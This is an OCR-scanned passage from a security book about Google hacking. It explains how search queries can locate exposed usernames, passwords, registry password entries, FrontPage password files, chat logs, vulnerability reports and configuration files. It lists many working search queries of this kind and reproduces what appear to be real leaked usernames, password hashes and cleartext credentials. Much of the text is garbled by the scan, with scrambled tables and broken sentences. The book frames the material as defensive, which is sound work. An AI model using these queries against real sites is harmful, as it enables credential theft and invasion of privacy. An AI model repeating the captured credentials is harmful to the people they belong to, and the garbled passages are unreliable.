they are poorly configured. Locating Network Hardware 0 AU sorts of network devices can be located with Google queries. These devices are more than a passing technological curiosity for some attackers, since many devices linked from the Web are poorly configured, trusted devices often overlooked by typical security auditors. Web cameras are often overlooked devices that can provide insight for an attacker, even though an extremely small percentage of targets have Web cameras installed. Network printers, when compromised, can reveal a great deal of sensitive information, especially for an attacker capable of viewing print jobs and network information. Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com. Q: I run an IIS 6.0 server, and I don't like the idea of those static HTTP 1.1 error pages hanging around my site, luring potential malicious interest in my server. How can I enable the customized error messages? Al If you aren't in the habit of just asking Google by now, you should be! Seriously, try a Google search for site:microsoft.com "Configuring Custom Error Messages" IIS 6.0. At the time of this writing, the article describing this pro- cedure is the first hit. The procedure involves firing up the IIS Manager, double-clicking My Computer, right-clicking the Web Sites folder, and selecting Properties. See the Custom Errors tab. Q: I run an Apache senR-, ancLI don't like the idea of those server tags on error messages and directc^pisfi^gs. can I turn these off? A: To remove the tags, ^ ate the sfcWon in your httpd.conf file (usually in /etc/httpd/conf/httpTconf) wMMWtains thefiaHowing: # # Optionally add a line containing serve:^version and virtual host # name to server-generated pages (error""'8S|^ments , FTP directory listings, ^^^^ # mod_status and mod_info output etc., but not CGI generated documents) . # Set to "EMail" to also include a mailto: link to the ServerAdmin . # Set to one of: On | Off | EMail # ServerSignature On Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware The ServerSignature setting can be changed to Off to remove the tag alto- gether or to Email, which presents an e-mail link with the ServerAdmin e- mail address as it appears in the httpd.conf file. Ql I've got an idea for a search that's not Hsted here. If you're so smart about Google, why isn't my search Hsted in this book? Al This book serves as more of a primer than a reference book. There are so many possible Google searches out there that it's impossible to include them all in one book. Most searches listed in this book are the result of a commu- nity of people working together to come up with as many effective searches as possible. Fortunately, this community of individuals has created a unique and extensive database that is open to the public for the purposes of ade- quately defending against this unique threat. The Search Engine Hacking forum and the Google Hacking Database (GHDB) are both available at http://johnny.ihackstuff.com. If you've got a new search, first search the database to make sure it's unique. If you think it is, submit it to the forums, and your search could be the newest addition to the database. But beware, Google searcher. Google hacking is fiin and addictive. If you submit one search, I think you'll find it's hard to stop. Just ask any of the individuals on the Google Master's list. Some of them found it hard to stop at 10 or 20 unique submitted searches! Check out the Acknowledgments page for a list of users who have made a significant contribution to the Google hacking community. Chapter 9 Usernames, Passwords, and Secret Stuff, Oh My! Ill Solutions in this Chapter: ■ Searching for Usernames ^ Searing for Passwords j^SearchingforCri ■ Searching for Other Juicy Info '0 Summary 0 Solutions Fast^rack 0 Frequently Asked Questions era! 4 1 264 Chapter 9 • Usernames, Passwords, and Secret Stuff, Oh My! Introduction This chapter is not about finding sensitive data during an assessment as much as it is about what the "bad guys" might do to troll for the data. The examples pre- sented in this chapter generally represent the lowest-hanging fruit on the security tree. Hackers target this information on a daily basis. To protect against this type of attacker, we need to be fairly candid about the worst-case possibiUties. We won't be overly candid, however. We start by looking at some queries that can be used to uncover usernames, the less important half of most authentication systems. The value of a username is often overlooked, but as we saw in Chapters 4 and 5 , an entire multimiUion- doUar security system can be shattered through skillful crafting of even the smallest, most innocuous bit of information. Next, we take a look at queries that are designed to uncover passwords. Some of the queries we look at reveal encrypted or encoded passwords, which wiU take a bit of work on the part of an attacker to use to his or her advantage. We also take a look at queries that can uncover cleartext passwords. These queries are some of the most dangerous in the hands of even the most novice attacker. What could make an attack easier than handing a username and cleartext password to an attacker? We wrap up this chapter by discussing the very real possibility of uncovering highly sensitive data such as credit card information and information used to commit identity theft, such as Social Security numbers. Our goal here is to explore ways of protecting against this very real threat. To that end, we don't go into details about uncovering financial information and the like. If you're a "dark side" hacker, you'U need to figure these things out on your own. Searching for Usernames Most authentication mechanisms use a username and password to protect infor- mation. To get through the "front door" of this type of protection, you'U need to determine usernames as weU as passwords. Usernames also can be used for social engineering efforts, as we discussed earlier. Many methods can be used to determine usernames. In Chapter 10, we explored ways of gathering usernames via database error messages. In Chapter 8 we explored Web server and application error messages that can reveal various information, including usernames. These indirect methods of locating usernames are helpful, but an attacker could target a usernames directory with a simple www. syngress.com Usernames, Passwords, and Secret Stuff, Oh My! • Chapter 9 265 query like "your username is". This phrase can locate help pages that describe the username creation process, as shown in Figure 9.1. Figure 9.1 Help Documents Can Reveal Username Creation Processes Your accoLirt - userrames ] fc^ |G|http:/;64,233.161,104/search7q " "vour us*^rname is" Undergraduates and Taught Postgraduates Usenwnea for Lndergraduates arri tajght postgraduates consist of your iiitials. a rumber (used to differentiate lietween common sets of initiaisj arid Ihs year of entry. abc502 or xyz203 abc502 woLid be tl°te Lsemame of the fifth person to subscribe with the initiais A. B.C. during the 02/03 academic year artd xyz2c:pwd inurl:_vti_pvt inurl:(Service | authors | administrators) FrontPage- ekendall:bYld1Sr73NLKo lQuisa:5zm94d7cdDFiQ # -FrontPage^ ekendalhbVldlSr/SNLKo loui3.a:5zm94d7cdDFiQ .orgi'garderobe' vti pvf service. pwd - Ik - Cach&d - Similar pages FrontPage- admlnYbVUnafKRmnQ # -FrontPage^ admin:VbV1JnafKRmnQ org/ COO 74 92 vti pvt/ service. pwd - 1k - Caclied - Simiiar pages FrontPage- grahaale ylLSFSEqk/cQs ftpdch:Zh4nBb7KWKsxl rineerdo .. # -FrontPage- grajnaai&ylLSFSEqlf/cQs flpdch:Zli4nBb7KWKsxl iserdoicaskSSqUyjjzQ spykecwirVRhzdwctSoypQ va.us/Schoois/DCHS/ vti..pvUservice.pwd - 1l( - Suppiementai Result - Caclied - Simiiar pages FrontPage- grahaale:5XLzQNL12VeNEftDbrD:Ed8A/1ICDWfgc # -FrontPage- 9rahaaie:5XLzoNL12VeNE ftpbrpiEdBA/llcpwfqc ' ya.usySclnoDlsyBPiPy vti pvyservice.pwd - Ik - Suppiementai Reauit - Cactied - Simiiar pages FrontPage- free:$ 1 $p5leU_hH $36Vc | jfVwlASYz3qlBy3cA. § -FrontPage- free:$1£pSieU_hH$36VqjfVwiASYzSqiBv3cA. .com/ vti. „pvL^ service. pwd - Ik - Caciied - Simiiar oaoes FrontPage- fDadnnin:glV41mLwSI6kg kherad:GRxN4Aia1rOIY # -FrontPage^ fpadminigiV41mLw6i5k9 kherad:GRxN4Aia1rOfY Jry-kiierady vli pvb' service. pwd - Ik - Cacl^&d - Similar p FrontPage- admin :Qc2yLX8tcpQv2 # -FrontPage^ admin:Oc2yD(9tcpOv2 ^ Display a m www.syngress.com 274 Chapter 9 • Usernames, Passwords, and Secret Stuff, Oh My! Exported Windows registry files often contain encrypted or encoded pass- words as well. If a user exports the Windows registry to a file and Google subse- quently crawls that fde, a query fdetypeireg intext:" internet account manager" could reveal interesting keys containing password data, as shown in Figure 9.7. Figure 9.7 Specific Windows Registry Entries Can Reveal Passwords O O O htlp;//216.239.39.104/search7q=cache:fpU |+&hl^en Or filetypeireg reg +intext:''internet account managef" (HKEY_CU3iaEHT_USEH\Software\Hioro3oft\ Internet Account Hanager\Aocoiint3\ 00000008 ] "Account Wanie" = "LiSP Email" "Connection Type "=dword: 00000001 "P0P3 Server "= "mail . - " "P0P3 User Uame"=!"" "SMTP Server "= "mail . " "gMTP Display tJaiiio" = "" "SMTP Email Address"=" " "P0P3 Skip Account"=dword:00000000 "SMTP Use Sicily "=dwordi 00000000 "Connection Flags"=dword5 00000000 "P0P3 Passwords "=hexiO 1,02, 40,00,69, 00, 53, 00, 50, 00, 20, 00, 45, 00, 6d, 00, 6 1,00, 69, \ 00, 6c, 00, 4 1,00, 46, 00, 32, 00, 34, 00, 46, 00, 44, 00, 45, 00, 30, 00, 00, 00 "P0P3 Port"=dword: 0000006e "P0P3 Secure Connection"=dword : 00000000 "P0P3 Timeout"=dword!0000005a "Leave Mail On Server"=dword: 00000000 "SMTP Port"=dwordi 00000019 "SMTP Secure Connection"=dword i 00000000 "SMTP Timeout"=dword!0000005a "SMTP Split Message3"=dword:00000000 Note that live, exported Windows registry files are not very common, but it's not uncommon for an attacker to target a site simply because of one exception- ally insecure file. It's also possible for a Google query to uncover cleartext pass- words. These passwords can be used as is without having to employ a password-cracking utility. In these extreme cases, the only challenge is deter- mining the username as well as the host on which the password can be used. As shown in Figure 9.8, certain queries wiU locate all the following information: usernames, cleartext passwords, and the host that uses that authentication! www. syngress.com Usernames, Passwords, and Secret Stuff, Oh My! • Chapter 9 275 Figure 9.8 The Holy Grail: Usernames, Cleartext Passwords, and Hostnames! name: = "momo": password: = "momo": URL: = "password. htm" ... name: = "momo"; password: = "momo"; URL: = "password.htm"; END_FILE new pas sword, log -Ik- Supplemental Result - Cached - Similar pages name: = "jbhunt": password: = "jbhunt": URL: = "http://home.nc.rr. ... name: = "jbhunt"; password: - "jbhunt"; URL: = "http: /clay123/ref23. html"; Beth Haas name: = "BHaas"; password: = "Beth Haas"; URL: = "http ... ■comyday 123j'passwordJo9 - 2k - Supplemental Result - Cached - Similar pages name: = ''dv21": password: = "dv21 2004": URL: = "intem.htm": name - [ Translate this page j name: = "dv2r'; password: = "dv21_2004"; URL: = "Intem.htm"; name: = "dv22"; password: = "dv22_2004"; URL: = "intem.htm"; name: = "dv23"; password ... .de/grossmann/password.lop - Ik - Cached - Similar pages There is no magic query for locating passwords, but during an assessment, remember that the simplest queries directed at a site can have amazing results, as we discussed in , Chapter 7, Ten Simple Searches. For example, a query like "Your password" forgot would locate pages that provide a forgotten password recovery mechanism. The information from this type of query can be used to formulate any of a number of attacks against a password. As always, effective social engi- neering is a terrific nontechnical solution to "forgotten" passwords. Another generic search for password information, intext: (password \ passcode | pass) intext: (username \ userid \ user), combines common words for passwords and user IDs into one query. This query returns a lot of results, but the vast majority of the top hits refer to pages that list forgotten password information, including either links or contact information. Using Google's translate feature, found at http://translate.google.com/translate_t, we could also create multilingual pass- word searches. Table 9.3 lists conmion translations for the word password. www. syngress.com 276 Chapter 9 • Usernames, Passwords, and Secret Stuff, Oh My! Table 9.3 English Translations of the Word Password Language vvora Translation German password Kennwort n 3 c c \ A ir\ r/H pdbbwuru CUll Lrdbfcrlld French password mot de passe Italian password parola d'accesso Portuguese password senha Dutch password Paswoord NOTJ The terms username and userid in most languages translate to username and userid, respectively. Searching for Credit Card Numbers, Social Security Numbers, and More Most people have heard news stories about Web hackers making off with cus- tomer credit card information. With so many fly-by night retailers popping up on the Internet, it's no wonder that credit card fraud is so prolific. These mom- and-pop retailers are not the only ones successfully compromised by hackers. Corporate giants by the hundreds have had financial database compromises over the years, victims of sometimes very technical, highly focused attackers. What might surprise you is that it doesn't take a rocket scientist to uncover live credit card numbers on the Internet, thanks to search engines like Google. Everything from credit information to banking data or supersensitive classified government documents can be found on the Web. Consider the (highly edited) Web page shown in Figure 9.9. www. syngress.com Usernames, Passwords, and Secret Stuff, Oh My! • Chapter 9 277 Figure 9.9 Google Stores Piles and Piles of Previously Pilfered Personal Data o o o 1 N - 1 1 C 1 ^ O - ^Or Google ^ B wmi ■ ^m-^m^ VISA • MH^HBIV m » - ^M — - • VISA * •> - «MM ; This document, found using Google, lists hundreds and hundreds of credit card numbers (including expiration date and card validation numbers) as well as the owners' names, addresses, and phone numbers. This particular document also included phone card (calling card) numbers. Notice the scroll bar on the right- hand side of Figure 9.9, an indicator that the displayed page is only a small part of this huge document — like many other documents of its kind. In most cases, pages that contain these numbers are not "leaked" from online retailers or e- commerce sites but rather are most likely the iruits of a scam known as phishing, in which users are solicited via telephone or e-mail for personal information. Several Web sites, including MillerSmiles.co.uk, document these scams and hoaxes. Figure 9.10 shows a screen shot of a popular eBay phishing scam that encourages users to update their eBay profile information. www. syngress.com Chapter 9 • Usernames, Passwords, and Secret Stuff, Oh My! Figure 9.10 Screenshot of an eBay Phishing Scam Update your eBay Account! ^ ^ 1 C ] ^hup://www.m[llersmiles.<:o,uk/ " Q' Google 1 1 Browse H Sell Search H Help \ Communtty 7^ 1 Update your Billing Information on your eBay a^^unt Use this seizure form to update your Billing Inf-omiati on on your eBay accga^^^^ transni^Bdliifoniudionis pro-tected by ttie industry standard encrypted SSL onneclaorL. a\ ^^^^^^^^^ ^nterVour eBav Information ^ ^^^[^^^^^^^^^^^^^^^| BBay ID mRaf Password 1 ^ Enter Your Credit/DeljicCard Information ^^^^^^^^^^^^^^^H credit/Debit ^3P*: 1 ^r^f^if fW^ Card Numb Br ' aVp eBay Welcomes I^Ss . (.X>> ^ , Card EHflljl^n |- _:J D*y: |- zJ Yean F 3 Once a user fills out this form, aU the information is sent via e-mail to the attacker, who can use it for just about anything. Tools and Traps Catching Online Scammers In some cases, you might be able to use Google to help nab the bad guys. Phishing scams are effective because the fake page looks like an official page. To create an official-looking page, the bad guys must have examples to work from, meaning that they must have visited a few legitimate com- panies' Web sites. If the fishing scam was created using text from several companies' existing pages, you can key in on specific phrases from the fake page, creating Google queries designed to round up the servers that hosted some of the original content. Once you've located the servers that con- tained the pilfered text, you can work with the companies involved to extract correlating connection data from their log files. If the scammer vis- ited each company's Web page, collecting bits of realistic text, his IP should appear in each of the log files. Auditors at SensePost (www.sensepost.com) have successfully used this technique to nab online scam artists. Continued Usernames, Passwords, and Secret Stuff, Oh My! • Chapter 9 279 Unfort^^^^^^^^^mmer uses an exact copy of a page from only one Social Security Numbers Social Security numbers (SSNs) and other sensitive data can be easily located with Google as well as via the same techniques used to locate credit card num- bers. For a variety of reasons, SSNs might appear online — for example, educa- tional facilities are notorious for using an SSN as a student ID, then posting grades to a public Web site with the "student ID" displayed next to the grade. A creative attacker can do quite a bit with just an SSN, but in many cases it helps to also have a name associated with that SSN. Again, educational faciHties have been found exposing this information via Excel spreadsheets listing student's names, grades, and SSNs, despite the fact that the student ID number is often used to help protect the privacy of the student! Although we don't feel it's right to go into the details of how this data is located, several media outlets have irre- sponsibly posted the details online. Although the blame Hes with the sites that are leaking this information, in our opinion it's stiU not right to draw attention to how exacdy the information can be located. Personal Financial Data In some cases, phishing scams are responsible for publicizing personal informa- tion; in other cases, hackers attacking online retails are to blame for this breach of privacy. Sadly, there are many instances where an individual is personally respon- sible for his own lack of privacy. Such is the case with personal financial infor- mation. With the explosion of personal computers in today's society, users have literally hundreds of personal finance programs to choose from. Many of these programs create data files with specific file extensions that can be searched with Google. It's hard to imagine why anyone would post personal financial informa- tion to a public Web site (which subsequently gets crawled by Google), but it must happen quite a bit, judging by the number of hits for program fries gener- ated by Quicken and Microsoft Money, for example. Although it would be somewhat irresponsible to provide queries here that would unearth personal financial data, it's important to understand the types of data that could potentially be uncovered by an attacker. To that end, Table 9.4 shows file extensions for var- ious financial, accounting, and tax return programs. Ensure that these filetypes aren't listed on a webserver you're charged with protecting. www.syngress.conn 280 Chapter 9 • Usernames, Passwords, and Secret Stuff, Oh My! Table 9.4 File Extensions for Various Financial Programs File Extension Description afm Abassis Finance Manager ab4 Accounting and Business File mmw AceMoney File Iqd AmeriCalc Mutual Fund Tax Report et2 Electronic Tax Return Security File (Australia) tax Intuit TurboTax Tax Return t98-t04 Kiplinger Tax Cut File (extension based on two-digit return year) mny Microsoft Money 2004 Money Data Files mbf Microsoft Money Backup Files inv MSN Money Investor File ptdb Peachtree Accounting Database qbb QuickBooks Backup Files reveal financial data qdf Quicken personal finance data soa Sage MAS 90 accounting software sdb Simply Accounting ctv SIX jimpiy lax rorm tmd Time and Expense Tracking tis Timeless Time & Expense fee U.S. Federal Campaign Expense Submission wow Wings Accounting File Searching for Other Juicy Info As we've seen, Google can be used to locate all sorts of sensitive information. In this section we take a look at some of the data that Google can find that's harder to categorize. From address books to chat log fdes and network vulnerability reports, there's no shortage of sensitive data online. Table 9.5 shows some queries that can be used to uncover various types of sensitive data. www. syngress.com Usernames, Passwords, and Secret Stuff, Oh My! • Chapter 9 281 Table 9.5 Queries That Locate Various Sensitive Information Query Description intext: "Session Start * * * *;*;* *" filetype:log filetypeibit bit + intext: screenname buddylist.bit intitle: index. of cgiirc. con fig in uri: cgiirc. con fig "Index of "/ "chat/logs" intitle: "Index Of" cookies.txt "size" "phone * * *" "address * " "e-mail" intitle: "curriculum vitae' ext:ini intext:env.ini intitle: index. of Inbox "Running in Child mode" ":8080" ":3128" ":80" filetype.txt intitle: "Index of" dbconvert.exe chats "sets mode: +p" "sets mode: +s" "Host Vulnerability Summary Report" "Network Vulnerability Assessment Report" filetype:pot inurhjohn.pot intitle: "Index Of" -inurhmaillog maillog size ext:mdb inurl:*.mdb inurl: fpdb shop.mdb AIM and IRC log files AIM buddy lists AIM buddy lists CGIIRC (Web-based IRC client) config file, shows IRC servers and user credentials CGIIRC (Web-based IRC client) config file, shows IRC servers and user credentials Chat logs cookies.txt file reveals user information Curriculum vitae (resumes) reveal names and address information Generic environment data Generic mailbox files Gnutella client data and statistics HTTP Proxy lists ICQ chat logs IRC private channel information IRC secret channel information ISS vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks ISS vulnerability scanner reports, reveal potential vulnerabilities on hosts and net- works John the Ripper password cracker results Maillog files reveals e-mail traffic information Microsoft FrontPage database folders Continued www. syngress.com Chapter 9 • Usernames, Passwords, and Secret Stuff, Oh My! Table 9.5 Queries That Locate Various Sensitive Information Query Description filetype:xls inurl .contact intitleiindex.of haccess.cti extilog "Software: Microsoft Internet Information Services *.*' filetype:pst inurl: "outlool<.pst" intitleiindex.of mt-db-pass.cgi filetypeictt ctt messenger "Tfiis file was generated by Nessus" inurl: "newsletter/admin/" inurl: "newsletter/admin/" intitle: "newsletter admin" filetype:eml emi intext: "Subject" +From intitle :index.of Inbox dbx intitle :index.of Inbox dbx filetype:mbx mbx intext: Subject inurl :lpublicl?Cmd = contents filetype:pdb pdb backup (Pilot I Pluckerdb) "This is a Shareaza Node" inurl : I JayoutsI settings inurl :ssl.conf filetype:conf site:edu admin grades intitle :index.of mystuff.xml inurhforward filetype: forward -cvs intitle :index.of dead. letter Microsoft Excel sheets containing contact information. Microsoft FrontPage equivalent(?)of htac- cess shows Web authentication info Microsoft Internet Information Services (IIS) log files Microsoft Qutlook e-mail and calendar backup files Movable Type default file MSN Messenger contact lists Nessus vulnerability scanner reports, reveal potential vulnerabilities on hosts and net- works Newsletter administration information Newsletter administration information Qutlook Express e-mail files Qutlook Express Mailbox files Qutlook Express Mailbox files Qutlook v1-v4 or Eudora mailbox files Qutlook Web Access public folders or appointments Palm Pilot Hotsync database files Shareaza client data and statistics Sharepoint configuration information SSL configuration files, reveal various con- figuration information Student grades Trillian user Web links UNIX mail forward files reveal e-mail addresses UNIX unfinished e-mails Continued www. syngress.com Usernames, Passwords, and Secret Stuff, Oh My! • Chapter 9 283 Table 9.5 Queries That Locate Various Sensitive Information Query Description filetype:conf inurl: unrealircd. UnreallRCd config file reveals configuration conf -CVS -gentoo information filetype:bkf bkf Windows XP/2000 backup files Some of this information is fairly benign — for example, MSN Messenger contact list fdes that can be found with a query lihe filetypextt messenger, or AOL Instant Messenger (AIM) buddy lists that can be located with a query such asjile- typeihlt bit +intext:screenname, as shown in Figure 9.11. Figure 9.11 AIM Buddy Lists Reveal Personal Relationships O O n http://316.23g. 39. lD4/search?q=c:ach..,:blt+blt+K3Binfextscreenname&hl=en \ < - j I C I ^"^1 " 'Just (Tomas's friend)" DobusS BerbCD "So what Raptorse. TnNisSTrl This screen shows a list of "buddies," or acquaintances an individual has entered into his or her AIM client. An attacker often uses personal information like this in a social-engineering attack, attempting to convince the target that they are a fi^iend or an acquaintance. This practice is akin to pilfering a Rolodex or address book from a target. For a seasoned attacker, information like this can lead to a successful compromise. However, in some cases, data found with a Google query reveals sensitive security-related information that even the most novice attacker could use to compromise a system. www. syngress.com 284 Chapter 9 • Usernames, Passwords, and Secret Stuff, Oh My! For example, consider the output of the Nessus security scanner available from www.nessus.org.This excellent open-source tool conducts a series of secu- rity tests against a target, reporting on any potential vulnerability. The report gen- erated by Nessus can then be used as a guide to help system administrators lock down any affected systems. An attacker could also use a report like this to locate vulnerabilities on a potential target. Using a Google query such as "Tltisfik was generated by Nessus", an attacker could locate reports generated by the Nessus tool, as shown in Figure 9. 12. This report lists the IP address of each tested machine as well as the ports opened and any vulnerabilities that were detected. Figure 9.12 Nessus Vulnerability Reports Found Online o o o 1(0] e ' Or 'This file was generaied t>y Nessus" List of open ports : o fip {2I/tcp) {Securtty hols foufid't o smtp (25kcp) (Security warnings found) o kUp {HOkcj}) (Security hole found} o epmi^f (IBSftcp) o kttps {443/tcp) o unknown {465/tcp) (Security warnings foufidj o unknown (JOlSftcp) o iad2 ilQSntcpj o unknown ( 1 033hcp ) o unknown (]037ftcp) o pcanywheredata (5631/tcp) o generaUudp (Security notes found) Vulnerability foimd on port ftp (21Acp) The remote FTP server closes the connection when one of !he commands USER, PASS or HELP is given with a loo long arguHKnt. This probably due lo a buffer overflow , which allows anyone lo execute arbitrary code on Ihc remote host. [back to the lia of ports ] I In most cases, reports found in this manner are samples, or test reports, but in a few cases, the reports are live and the tested systems are, in fact, exploitable as listed. One can only hope that the reported systems are honeypots — machines created for the sole purpose of luring and tracing the activities of hackers. In the next chapter, we'U talk more about "document-grinding" techniques, which are also useful for digging up this type of information. This chapter focused on locating the information based on the name of the file, whereas the next chapter focuses on the actual content of a document rather than the name. www. syngress.com Usernames, Passwords, and Secret Stuff, Oh My! • Chapter 9 Summary Make no mistake — there's sensitive data on the Web, and Google can find it. There's hardly any limit to the scope of information that can be located, if only you can figure out the right query. From usernames to passwords, credit card and Social Security numbers, and personal financial information, it's aU out there. As a purveyor of the "dark arts," you can relish in the stupidity of others, but as a pro- fessional tasked with securing a customer's site from this dangerous form of information leakage, you could be overwhelmed by the sheer scale of your defensive duties. As droU as it might sound, a soHd, enforced security poHcy is a great way to keep sensitive data irom leaking to the Web. If users understand the risks associ- ated with information leakage and understand the penalties that come with vio- lating policy, they wiU be more willing to cooperate in what should be a security partnership. In the meantime, it certainly doesn't hurt to understand the tactics an adver- sary might employ in attacking a Web server. One thing that should become clear as you read this book is that any attacker has an overwhelming number of fdes to go after. One way to prevent dangerous Web information leakage is by denying requests for unknown file types. Whether your Web server normally serves up CFM, ASP, PHP, or HTML, it's infinitely easier to manage what should be served by the Web server instead of focusing on what should not be served. Adjust your servers or your border protection devices to allow only specific con- tent or file types. Solutions Fast Track Searching for Usernames 0 Usernames can be found in a variety of locations. 0 In some cases, digging through documents or e-mail directories might be required. 0 A simple query such as "your username is" can be very effective in locating usernames. 286 Chapter 9 • Usernames, Passwords, and Secret Stuff, Oh My! Searching for Passwords 0 Passwords can also be found in a variety locations. 0 A query such as "Your password" forgot can locate pages that provide a forgotten-password recovery mechanism. 0 intext: (password \ passcode \ pass) intext:(username \ userid \ user) is another generic search for locating password information. Searching for Credit Cards Numbers, Social Security Numbers, and More 0 Documents containing credit card and Social Security number information do exist and are relatively prolific. 0 Some irresponsible news outlets have revealed functional queries that locate this information. 0 There are relatively few examples of personal financial data ordine, but there is a great deal of variety. 0 In most cases, specific file extensions can be searched for. Searching for Other Juicy Info 0 From address books and chat log files to network vulnerabiHty reports, there's no shortage of sensitive data online. www. syngress.com Usernames, Passwords, and Secret Stuff, Oh My! • Chapter 9 Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com. Ql I'm concerned about phishing schemes. Are there resources to help me understand the risks and learn some safeguards? Al There's an excellent Web site dedicated to the topic of phishing at www.antiphishing.org.You can also read a great white paper by Next Generation Security Software Ltd., The Phishing Guide: Understanding and Preventing Phishing Attacks, available from www.ngssoftware.com/ papers/NISR-WP-Phishing.pdf Ql Why don't you give more details about locating information such as credit card numbers and SWHWRurity numbers? theauthors nor the publisher is willing to take personal luragmg pjfcntial illegal activity. Most individuals inter- Iformaticjw wil use it for illegal purposes. If you are interested in scanning for your own personal information online, simply enter your information into Goo^^If yoj^et sqpie hits, ibu should be worried. To be honest, neither responsibiHty for end ested in this kind of I hy should I be wor- ut to the Web? opt for the easiest path Q: Many passwords grant access to meaningle^ ried about the password for a useless servic^ A: Studies have shown that the majority of people ol to completing a task. In the world of security, this meSis that many people share passwords (or password cues) across many different applications on many different servers. This means that one compromised password can pro- vide clues about passwords used on other systems. Most poHcies forbid this type of password sharing, but this restriction is often hard to enforce. 288 Chapter 9 • Usernames, Passwords, and Secret Stuff, Oh My! Q: What can bad guys do with the password to our database? And if the infor- mation is not sensitive, why go the extra mile to protect it ? A: Users generally have a small set of passwords they can remember. This means that once a bad guy has a valid password, chances are good that it wiU "Open Sesame" to more sensitive data. www. syngress.com Document Grinding and Database Digging pt Solutions in this Chapter ■ Configuration Files m ^ Log m^s Log 1^ ■ Office Documen Database Information ^^Ipl^oma^l^Grinding ■ Google D^Q^i^ ■> ■ Links to Sites w w % '0 Summary 0 Solutions Fast^rack 0 Frequently Asked Questions 290 Chapter 10 • Document Grinding and Database Digging Introduction There's no shortage of documents on the Internet. Good guys and bad guys alike can use information found in documents to achieve their distinct purposes. In this chapter we take a look at ways you can use Google to not only locate these documents but to search within these documents to locate information. There are so many different types of documents that we can't hope to cover them all, but we'll look at the documents in distinct categories based on their function. Specifically, we'll take a look at a few categories such as configuration files, log files, and office documents. Once we've looked at distinct fde types, we'U delve into the realm of database digging. We won't examine the details of the Structured Query Language (SQL) or database architecture and interaction; rather, we'U look at the many ways Google hackers can locate and abuse database systems armed with nothing more than a search engine. One important thing to remember about document digging is that Google will only search the rendered, or visible, view of a document. For example, con- sider a Microsoft Word document. This type of document can contain metadata, as shown in Figure 10.1 These fields include such things as the subject, author, manager, company, and much more. Google will not search these fields. If you're interested in getting to the metadata within a file, you'll have to download the actual file and check the metadata yourself. Figure 10.1 Microsoft Word Metadata Dacument Grind2.doc PropertieB ,, j General \ SuirifiMfy— | Statisiics Contents Custom - Title: I @PNDocurnert Grinding Authan jOhnny Manager: Company: Syngress Media Category: Keywords: I Comments: T L Hyperiink base: | Template: \GUIDELINES\Author_5vngress^ALitliorTemp-DaT.dot Q Save preview pictLre ( Cancef ) ( Pit j ] www. syngress.com Document Grinding and Database Digging • Chapter 10 291 Configuration Files Configuration files store program settings. An attacker (whether a good guy or a bad guy) can use these fdes to glean insight into the way the program is used and perhaps, by extension, into how the system or network it s on is used or config- ured. As we've seen in previous chapters, even the smallest tidbit of information is of interest to a skilled attacker. Consider the file shown in Figure 10.2. This file, found with a query such as filetype'Ani inurlivi^s^tp, is a configuration fde used by the WS_FTP client pro- gram. When the WS_FTP program is downloaded and installed, the configura- tion file contains nothing more than a list of popular, public Internet FTP servers. However, over time, this configuration file can be automatically updated to include the name, directory, username, and password of FTP servers the user connects to. Although the password is encoded when it is stored, some free pro- grams can crack these passwords with relative ease. Figure 10.2 The WS_FTP.INI File Contains Hosts, Usernames, and Passwords '"O O O http://216.239. 41. 104/sear...ype:inf+injrl:ws^ftp&hl=en [VAXAl flOST"vaxa. iso . UID^phlica LOCDIR=C : \teiiip PASVHODE-0 [ISH] BQST^ ftp.pcGQ. ibm. com UID^anonymous PWD=phli C3 . rit . edu PASVHOCE=sO flOSTBSunsite edu UID^anonymous LOCDIE^C ! \tQiiip\slackware DIR" /pub/Linux/distributioDs/slackware PASVMODE-O [UUPC] BOST=grasp . insa-lyon . f r UID^anonymous LOCDIR^c ! \tei!ip DIR=/pub/m3dos/network/iiiipc PASVHODE=0 [ vax] HOST-ritvax. isc . UID=phlic3 PASVHODE-0 . edu Display a ms.m Chapter 10 • Document Grinding and Database Digging Underground Googling Locating Files To locate files, it's best to try different types of queries. For example, intitle:index.of ws_ftp.ini will return results, but so will filetype:ini inurhws ftp.ini. The inurl search, however, is often the better choice. First, the filetype search allows you to browse right to a cached version of the page. Second, the directory listings found by the index.of search might not allow you access to the file. Third, directory listings are not overly common. The filetype search will locate your file no matter how Google found it. Regardless of the type of data in a configuration fde, sometimes the mere exis- tence of a configuration file is significant. If a configuration file is located on a server, there's a chance that the accompanying program is installed somewhere on that server or on neighboring machines on the network. Although this might not seem like a big deal in the case of FTP client software, consider a search hkejile- typexonf inurhfirewaU, which can locate generic firewall configuration files. This example demonstrates one of the most generic naming conventions for a configu- ration file, the use of the conf file extension. Other generic naming conventions can be combined to locate other equally common naming conventions. One of the most common base searches for locating configuration files is simply (inurlxonf OR inurlxonfig OR inurlxfg), which incorporates the three most common configuration file prefixes. This base search uses the inurl operator, since the filetype operator cannot be successfully ORed together at the time of this writing. If an attacker knows the name of a configuration file as it shipped from the software author or vendor, he can simply create a search targeting that filename using the filetype and inurl operators. However, most programs allow you to refer- ence a configuration file of any name, making a Google search slightly more dif- ficult. In these cases, it helps to get an idea of the contents of the configuration file, which could be used to extract unique strings for use in an effective base search. Sometimes, combining a generic base search with the name (or acronym) of a software product can have satisfactory results, as a search for (inurlxonf OR inurlxonfig OR inurlxfg) MRTG shows in Figure 10.3. Document Grinding and Database Digging • Chapter 10 293 Figure 10.3 Generic Configuration File Searching [^O O O Google Search: (InuH cfg OR inurl config OR mur[:conf) mrtg ^[^^^^ I !mafla.o^9ylost^■found/mr1g.^!fg -1k- Cach'&d - Similar pagss conf-strings ... With MRTG, using and/or "$"forthe target of a MRTG conf string has a "positional" context anec-2003 20:01 21K mr1g.cfg.new 1O-Dec-2O03 20:15 21K ... stuff.mlt.9du/afs/slpbyprojecf mrlg/config/ - 2k - Cach&d - Similar paces #FreeBSD MRTG Configuration File #by Michael Lucas, mwlucas ... ... not commented out!) In your snmfKl.conf: ftdlsk / #disk ... begin 